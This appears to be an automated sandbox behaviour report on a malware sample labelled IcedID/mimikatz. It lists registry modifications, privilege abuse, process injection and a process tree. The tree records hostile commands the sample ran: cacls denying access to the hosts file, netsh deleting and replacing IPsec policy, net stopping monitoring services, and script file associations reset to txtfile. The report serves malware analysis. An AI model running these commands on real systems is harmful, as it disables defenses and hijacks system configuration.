netsh.execmd.exeuzurgcimy.execmd.exenetsh.exenetsh.exenetsh.execmd.execacls.execmd.exenetsh.execmd.exenet.exe2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exenetsh.execmd.exenet.exenet1.exeschtasks.exenetsh.exenetsh.execmd.exenet1.execmd.exenetsh.execmd.exenetsh.exeschtasks.exenet1.exenet.exenet1.execmd.exenet1.exenet1.exenet.exexohudmc.exenetsh.execmd.execmd.execmd.exetsgwibn.execacls.exenet.exenet.exejobnkm.execmd.execmd.execacls.exesc.execacls.execmd.exenet1.exenetsh.execmd.execmd.exenet.exetsgwibn.exenet1.exenet.exenetsh.exesc.exesc.execacls.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uzurgcimy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jobnkm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tsgwibn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 4232 cmd.exe 1964 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000b000000023b5c-6.dat nsis_installer_2 behavioral2/files/0x0011000000023c7f-15.dat nsis_installer_1 behavioral2/files/0x0011000000023c7f-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
cumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exetsgwibn.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ tsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" tsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" tsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" tsgwibn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" tsgwibn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump cumgbbwyg.exe -
Modifies registry class 14 IoCs
Processes:
tsgwibn.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" tsgwibn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" tsgwibn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ tsgwibn.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 3164 schtasks.exe 416 schtasks.exe 3012 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
tsgwibn.exepid Process 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exepid Process 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exetsgwibn.exetsgwibn.exevfshost.execumgbbwyg.exewerigg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.execumgbbwyg.exedescription pid Process Token: SeDebugPrivilege 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2328 tsgwibn.exe Token: SeDebugPrivilege 3868 tsgwibn.exe Token: SeDebugPrivilege 4088 vfshost.exe Token: SeDebugPrivilege 4224 cumgbbwyg.exe Token: SeLockMemoryPrivilege 1564 werigg.exe Token: SeLockMemoryPrivilege 1564 werigg.exe Token: SeDebugPrivilege 4928 cumgbbwyg.exe Token: SeDebugPrivilege 3024 cumgbbwyg.exe Token: SeDebugPrivilege 1216 cumgbbwyg.exe Token: SeDebugPrivilege 2808 cumgbbwyg.exe Token: SeDebugPrivilege 2936 cumgbbwyg.exe Token: SeDebugPrivilege 2028 cumgbbwyg.exe Token: SeDebugPrivilege 984 cumgbbwyg.exe Token: SeDebugPrivilege 4332 cumgbbwyg.exe Token: SeDebugPrivilege 2256 cumgbbwyg.exe Token: SeDebugPrivilege 4352 cumgbbwyg.exe Token: SeDebugPrivilege 2340 cumgbbwyg.exe Token: SeDebugPrivilege 1084 cumgbbwyg.exe Token: SeDebugPrivilege 2668 cumgbbwyg.exe Token: SeDebugPrivilege 3328 cumgbbwyg.exe Token: SeDebugPrivilege 4548 cumgbbwyg.exe Token: SeDebugPrivilege 3056 cumgbbwyg.exe Token: SeDebugPrivilege 3532 cumgbbwyg.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exetsgwibn.exetsgwibn.exexohudmc.exejobnkm.exetsgwibn.exetsgwibn.exepid Process 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe 2328 tsgwibn.exe 2328 tsgwibn.exe 3868 tsgwibn.exe 3868 tsgwibn.exe 4544 xohudmc.exe 1072 jobnkm.exe 3992 tsgwibn.exe 3992 tsgwibn.exe 5472 tsgwibn.exe 5472 tsgwibn.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.execmd.exetsgwibn.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 1484 wrote to memory of 4232 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe 86 PID 1484 wrote to memory of 4232 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe 86 PID 1484 wrote to memory of 4232 1484 2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe 86 PID 4232 wrote to memory of 1964 4232 cmd.exe 88 PID 4232 wrote to memory of 1964 4232 cmd.exe 88 PID 4232 wrote to memory of 1964 4232 cmd.exe 88 PID 4232 wrote to memory of 2328 4232 cmd.exe 94 PID 4232 wrote to memory of 2328 4232 cmd.exe 94 PID 4232 wrote to memory of 2328 4232 cmd.exe 94 PID 3868 wrote to memory of 2936 3868 tsgwibn.exe 96 PID 3868 wrote to memory of 2936 3868 tsgwibn.exe 96 PID 3868 wrote to memory of 2936 3868 tsgwibn.exe 96 PID 2936 wrote to memory of 3788 2936 cmd.exe 98 PID 2936 wrote to memory of 3788 2936 cmd.exe 98 PID 2936 wrote to memory of 3788 2936 cmd.exe 98 PID 2936 wrote to memory of 2728 2936 cmd.exe 99 PID 2936 wrote to memory of 2728 2936 cmd.exe 99 PID 2936 wrote to memory of 2728 2936 cmd.exe 99 PID 2936 wrote to memory of 4060 2936 cmd.exe 100 PID 2936 wrote to memory of 4060 2936 cmd.exe 100 PID 2936 wrote to memory of 4060 2936 cmd.exe 100 PID 2936 wrote to memory of 4288 2936 cmd.exe 101 PID 2936 wrote to memory of 4288 2936 cmd.exe 101 PID 2936 wrote to memory of 4288 2936 cmd.exe 101 PID 2936 wrote to memory of 3896 2936 cmd.exe 103 PID 2936 wrote to memory of 3896 2936 cmd.exe 103 PID 2936 wrote to memory of 3896 2936 cmd.exe 103 PID 2936 wrote to memory of 4704 2936 cmd.exe 104 PID 2936 wrote to memory of 4704 2936 cmd.exe 104 PID 2936 wrote to memory of 4704 2936 cmd.exe 104 PID 3868 wrote to memory of 5096 3868 tsgwibn.exe 107 PID 3868 wrote to memory of 5096 3868 tsgwibn.exe 107 PID 3868 wrote to memory of 5096 3868 tsgwibn.exe 107 PID 3868 wrote to memory of 1912 3868 tsgwibn.exe 109 PID 3868 wrote to memory of 1912 3868 tsgwibn.exe 109 PID 3868 wrote to memory of 1912 3868 tsgwibn.exe 109 PID 3868 wrote to memory of 1788 3868 tsgwibn.exe 111 PID 3868 wrote to memory of 1788 3868 tsgwibn.exe 111 PID 3868 wrote to memory of 1788 3868 tsgwibn.exe 111 PID 3868 wrote to memory of 1448 3868 tsgwibn.exe 113 PID 3868 wrote to memory of 1448 3868 tsgwibn.exe 113 PID 3868 wrote to memory of 1448 3868 tsgwibn.exe 113 PID 1448 wrote to memory of 4080 1448 cmd.exe 115 PID 1448 wrote to memory of 4080 1448 cmd.exe 115 PID 1448 wrote to memory of 4080 1448 cmd.exe 115 PID 4080 wrote to memory of 4772 4080 wpcap.exe 116 PID 4080 wrote to memory of 4772 4080 wpcap.exe 116 PID 4080 wrote to memory of 4772 4080 wpcap.exe 116 PID 4772 wrote to memory of 1852 4772 net.exe 118 PID 4772 wrote to memory of 1852 4772 net.exe 118 PID 4772 wrote to memory of 1852 4772 net.exe 118 PID 4080 wrote to memory of 4404 4080 wpcap.exe 119 PID 4080 wrote to memory of 4404 4080 wpcap.exe 119 PID 4080 wrote to memory of 4404 4080 wpcap.exe 119 PID 4404 wrote to memory of 1484 4404 net.exe 121 PID 4404 wrote to memory of 1484 4404 net.exe 121 PID 4404 wrote to memory of 1484 4404 net.exe 121 PID 4080 wrote to memory of 2772 4080 wpcap.exe 122 PID 4080 wrote to memory of 2772 4080 wpcap.exe 122 PID 4080 wrote to memory of 2772 4080 wpcap.exe 122 PID 2772 wrote to memory of 3584 2772 net.exe 124 PID 2772 wrote to memory of 3584 2772 net.exe 124 PID 2772 wrote to memory of 3584 2772 net.exe 124 PID 4080 wrote to memory of 984 4080 wpcap.exe 125
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\TEMP\sbymbrggy\werigg.exe"C:\Windows\TEMP\sbymbrggy\werigg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-29_4e3e045397c8f2890346d8443eb37f4b_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\guiyywyg\tsgwibn.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1964
-
-
C:\Windows\guiyywyg\tsgwibn.exeC:\Windows\guiyywyg\tsgwibn.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2328
-
-
-
C:\Windows\guiyywyg\tsgwibn.exeC:\Windows\guiyywyg\tsgwibn.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3868 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4060
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:4288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3896
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4704
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5096
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1788
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\vguwtuflb\imnwwtqyn\wpcap.exeC:\Windows\vguwtuflb\imnwwtqyn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1852
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1484
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:3584
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:984 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1772
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2900 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2124 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:5100
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2892 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1604
-
-
-
-
